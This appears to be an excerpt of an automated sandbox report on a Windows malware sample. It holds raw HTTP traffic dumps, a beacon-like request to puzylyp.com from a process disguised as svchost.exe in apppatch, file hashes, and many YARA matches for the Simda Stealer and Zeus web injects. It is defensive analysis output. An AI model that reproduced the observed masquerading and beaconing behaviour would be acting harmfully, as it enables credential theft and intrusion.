                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1369INData Raw: 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74
                                                                                                                                                                                                                  Data Ascii: content .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  10192.168.2.65021099.83.170.34431220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: puzylyp.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC352INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                                  Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Etag: "ua6lz52rn119wv"
                                                                                                                                                                                                                  Server: Caddy
                                                                                                                                                                                                                  Server: awselb/2.0
                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                  X-Powered-By: Next.js
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC2372INData Raw: 38 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 70 75 62 6c 69 63 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31
                                                                                                                                                                                                                  Data Ascii: 8000<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><link rel="apple-touch-icon" sizes="180x180" href="https://d15wejze7d2tlj.cloudfront.net/v1/public/apple-touch-icon.png"/><link rel="icon" type="image/png" sizes="32x32" href="https://d1
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC1724INData Raw: 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 31 35 35 61 35 35 36 2d 37 32 37 37 64 32 30 35 62 33 61 39 36 64 64 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 62 37 37 39 62 62 35 65 2d 65 33 34 61 63 36 66 32 62 33 32 65 65 39 62 31 2e 6a 73 22 20 64 65 66 65 72 3d 22 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 64 31 35 77 65 6a 7a 65 37 64 32 74 6c 6a 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 76 31 2f 5f 6e 65 78 74 2f 73 74 61 74 69 63 2f
                                                                                                                                                                                                                  Data Ascii: ext/static/chunks/b155a556-7277d205b3a96dd1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/chunks/b779bb5e-e34ac6f2b32ee9b1.js" defer=""></script><script src="https://d15wejze7d2tlj.cloudfront.net/v1/_next/static/
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC4744INData Raw: 78 2d 63 6f 6c 20 67 61 70 2d 32 20 6d 62 2d 36 22 3e 3c 68 32 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 78 6c 20 66 6f 6e 74 2d 62 6f 6c 64 20 73 6d 3a 74 65 78 74 2d 32 78 6c 22 3e 49 6e 71 75 69 72 65 20 74 6f 64 61 79 20 74 6f 20 73 65 63 75 72 65 20 74 68 69 73 20 64 6f 6d 61 69 6e 3c 2f 68 32 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 49 6e 74 65 72 20 74 65 78 74 2d 73 6d 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 73 6d 3a 74 65 78 74 2d 62 61 73 65 22 3e 50 6c 65 61 73 65 20 63 6f 6d 70 6c 65 74 65 20 74 68 65 20 66 6f 72 6d 20 62 65 6c 6f 77 20 61 6e 64 20 77 65 20 77 69 6c 6c 20 63 6f 6e 6e 65 63 74 20 79 6f 75 20 77 69 74 68 20 6f 6e 65 20 6f 66 20 6f 75 72 20 64 6f 6d 61 69 6e 20 65 78 70 65 72 74 73 2e
                                                                                                                                                                                                                  Data Ascii: x-col gap-2 mb-6"><h2 class="font-Inter text-xl font-bold sm:text-2xl">Inquire today to secure this domain</h2><span class="font-Inter text-sm font-normal sm:text-base">Please complete the form below and we will connect you with one of our domain experts.
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC5930INData Raw: 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 44 45 22 3e 44 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 34 39 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 50 45 22 3e 50 45 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 31 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 4d 58 22 3e 4d 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 32 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 55 22 3e 43 55 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 35 33 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e
                                                                                                                                                                                                                  Data Ascii: -- -->)</option><option value="DE">DE... --> (+... -->49... -->)</option><option value="PE">PE... --> (+... -->51... -->)</option><option value="MX">MX... --> (+... -->52... -->)</option><option value="CU">CU... --> (+... -->53... -->)</option
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC7116INData Raw: 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 36 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 43 59 22 3e 43 59 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 37 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 41 58 22 3e 41 58 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 46 49 22 3e 46 49 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20 2d 2d 3e 33 35 38 3c 21 2d 2d 20 2d 2d 3e 29 3c 2f 6f 70 74 69 6f 6e 3e 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 42 47 22 3e 42 47 3c 21 2d 2d 20 2d 2d 3e 20 28 2b 3c 21 2d 2d 20
                                                                                                                                                                                                                  Data Ascii: --> (+... -->356... -->)</option><option value="CY">CY... --> (+... -->357... -->)</option><option value="AX">AX... --> (+... -->358... -->)</option><option value="FI">FI... --> (+... -->358... -->)</option><option value="BG">BG... --> (+...
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC8302INData Raw: 69 63 65 2d 72 65 71 75 65 73 74 2d 66 6f 72 6d 2d 69 64 22 20 74 69 74 6c 65 3d 22 47 65 74 20 70 72 69 63 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 6c 61 62 65 6c 3d 22 47 65 74 20 70 72 69 63 65 22 20 65 6e 64 49 63 6f 6e 3d 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 6a 75 73 74 69 66 79 2d 63 65 6e 74 65 72 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 31 2e 35 20 6d 78 2d 61 75 74 6f 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 65 78 20 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 67 61 70 2d 32 22 3e 47 65 74 20 70 72 69 63 65 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20
                                                                                                                                                                                                                  Data Ascii: ice-request-form-id" title="Get price" aria-label="Get price" label="Get price" endIcon="[object Object]"><span class="flex justify-center items-center gap-1.5 mx-auto"><div class="flex items-center gap-2">Get price<svg xmlns="http://www.w3.org/2000/svg"
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC2586INData Raw: 30 2e 33 76 2e 30 36 37 68 2d 2e 31 33 36 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 56 2e 37 36 48 39 2e 39 36 76 2e 30 36 38 68 2d 2e 31 33 36 76 2e 30 36 37 68 2d 2e 30 36 38 76 2e 30 36 38 48 39 2e 36 39 76 2e 30 36 38 48 39 2e 36 32 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 31 33 35 76 2e 30 36 37 48 39 2e 33 35 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 39 2e 30 38 76 2e 30 36 38 48 39 2e 30 31 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 37 76 2e 30 36 37 48 38 2e 37 34 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 38 68 2d 2e 30 36 38 76 2e 30 36 37 48 38
                                                                                                                                                                                                                  Data Ascii: 0.3v.067h-.136v.068h-.068v.068h-.067V.76H9.96v.068h-.136v.067h-.068v.068H9.69v.068H9.62v.068h-.068v.068h-.135v.067H9.35v.068h-.068v.068h-.068v.068h-.068v.067H9.08v.068H9.01v.068h-.068v.068h-.068v.068h-.067v.067H8.74v.068h-.068v.068h-.068v.068h-.068v.067H8
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC4096INData Raw: 36 38 38 31 0d 0a 65 6e 74 43 6f 6c 6f 72 22 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 39 2e 36 37 20 34 2e 34 37 34 68 2d 33 2e 39 34 36 76 31 31 2e 32 38 37 68 33 2e 39 34 35 63 33 2e 36 30 36 20 30 20 35 2e 39 35 2d 32 2e 32 31 35 20 35 2e 39 35 2d 35 2e 36 32 37 20 30 2d 33 2e 34 32 39 2d 32 2e 33 34 34 2d 35 2e 36 36 2d 35 2e 39 35 2d 35 2e 36 36 6d 2d 31 2e 36 38 33 20 39 2e 33 36 32 56 36 2e 33 38 32 68 31 2e 36 30 31 63 32 2e 33 37 38 20 30 20 33 2e 37 32 20 31 2e 34 30 37 20 33 2e 37 32 20 33 2e 37 35 32 73 2d 31 2e 33 34 32 20 33 2e 37 30 32 2d 33 2e 37 32 20 33 2e 37 30 32 7a 6d 31 37 2e 39 38 32 2d 32 2e 35 35 34 63 30 2d 32 2e 38 33 2d 32 2e 30 32 32 2d 34 2e 36 32 35 2d 34 2e 36 30 39 2d 34 2e 36 32 35 73
                                                                                                                                                                                                                  Data Ascii: 6881entColor" fill-rule="evenodd" d="M29.67 4.474h-3.946v11.287h3.945c3.606 0 5.95-2.215 5.95-5.627 0-3.429-2.344-5.66-5.95-5.66m-1.683 9.362V6.382h1.601c2.378 0 3.72 1.407 3.72 3.752s-1.342 3.702-3.72 3.702zm17.982-2.554c0-2.83-2.022-4.625-4.609-4.625s
                                                                                                                                                                                                                  2024-11-11 17:51:09 UTC13046INData Raw: 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 35 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 31 33 36 76 2d 2e 31 33 35 68 2d 2e 30 36 37 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 31 33 35 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 38 76 2d 2e 30 36 38 68 2d 2e 30 36 37 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 30 36 37 68 2d 2e 30 36 38 76 2d 2e 31 33 36 68 2d 2e 30 36 38 76 2d 2e 31 33 36
                                                                                                                                                                                                                  Data Ascii: 068h-.068v-.068h-.135v-.068h-.136v-.068h-.136v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.068v-.067h-.067v-.068h-.068v-.068h-.068v-.068h-.136v-.135h-.067v-.068h-.068v-.068h-.068v-.135h-.068v-.068h-.068v-.068h-.067v-.136h-.068v-.067h-.068v-.136h-.068v-.136


                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                  Start time:12:50:23
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\UMwpXhA46R.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\UMwpXhA46R.exe"
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  File size:1'179'648 bytes
                                                                                                                                                                                                                  MD5 hash:239B74D7AC38014E61CC335630AC22D6
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000003.2148607507.0000000000703000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: unknown
                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                  General

                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                  Start time:12:50:24
                                                                                                                                                                                                                  Start date:11/11/2024
                                                                                                                                                                                                                  Path:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                  Commandline:"C:\Windows\apppatch\svchost.exe"
                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                  File size:1'179'648 bytes
                                                                                                                                                                                                                  MD5 hash:E132561B9EE04A2EDDF6460BE4A89362
                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2774994198.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2809572996.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2784640433.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2575291599.000000000F380000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2612530811.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2544138671.000000000D580000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2775654849.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2587965689.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3402365018.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3417374807.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2793511340.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2763018604.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2754985393.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2786368119.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2776797358.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2763556222.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2775373199.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2522335301.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2519685174.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2763964877.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2808903395.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2761135252.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2726433713.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2633125874.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2774233552.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2517359385.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: JoeSecurity_SimdaStealer, Description: Yara detected Simda Stealer, Source: 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2168260986.0000000000881000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000002.3416553301.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2760597306.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                  • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000002.00000003.2773682224.0000000000B00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
